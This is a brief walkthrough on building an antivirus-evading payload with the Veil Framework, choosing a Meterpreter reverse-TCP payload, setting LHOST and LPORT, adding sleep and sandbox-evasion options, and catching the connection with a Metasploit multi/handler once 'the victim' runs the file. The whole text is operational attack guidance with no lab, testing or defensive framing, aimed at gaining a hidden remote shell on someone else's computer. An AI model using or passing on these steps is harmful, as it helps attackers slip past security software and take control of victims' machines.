To create an undetectable payload using the Veil Framework, you must first launch the application by typing veil in your terminal. Once the main menu appears, enter use 1 to access the Evasion menu, which contains the tools specifically designed for bypassing antivirus software. To see a complete list of available payload types, type list. For high success rates against modern security suites, it is recommended to use payloads written in languages like Go or Python, such as go/meterpreter/rev_tcp. Enter the corresponding number or the full path of the payload you wish to use.
After selecting your payload, you must configure the connection settings by entering set LHOST followed by your IP address and set LPORT followed by your desired listening port. To further increase the chances of remaining undetected, you can modify optional settings such as SLEEP to delay execution or processors to ensure the file isn’t running in a basic sandbox. Once your configuration is complete, type generate to build the executable. You will be prompted to name your file; after providing a name, Veil will compile the payload and provide the directory path where the new executable is stored, typically within the veil-output folder.
To catch the connection from your new undetectable payload, open a second terminal and launch Metasploit by typing msfconsole. You must manually set up a multi-handler by entering use exploit/multi/handler. Set the payload type to match exactly what you generated in Veil, for example, set PAYLOAD windows/meterpreter/reverse_tcp. Match the LHOST and LPORT values to those used during the generation phase and then type run or exploit. Once the victim executes the Veil-generated file, the antivirus will likely remain silent, and a Meterpreter session will be established in your Metasploit console.
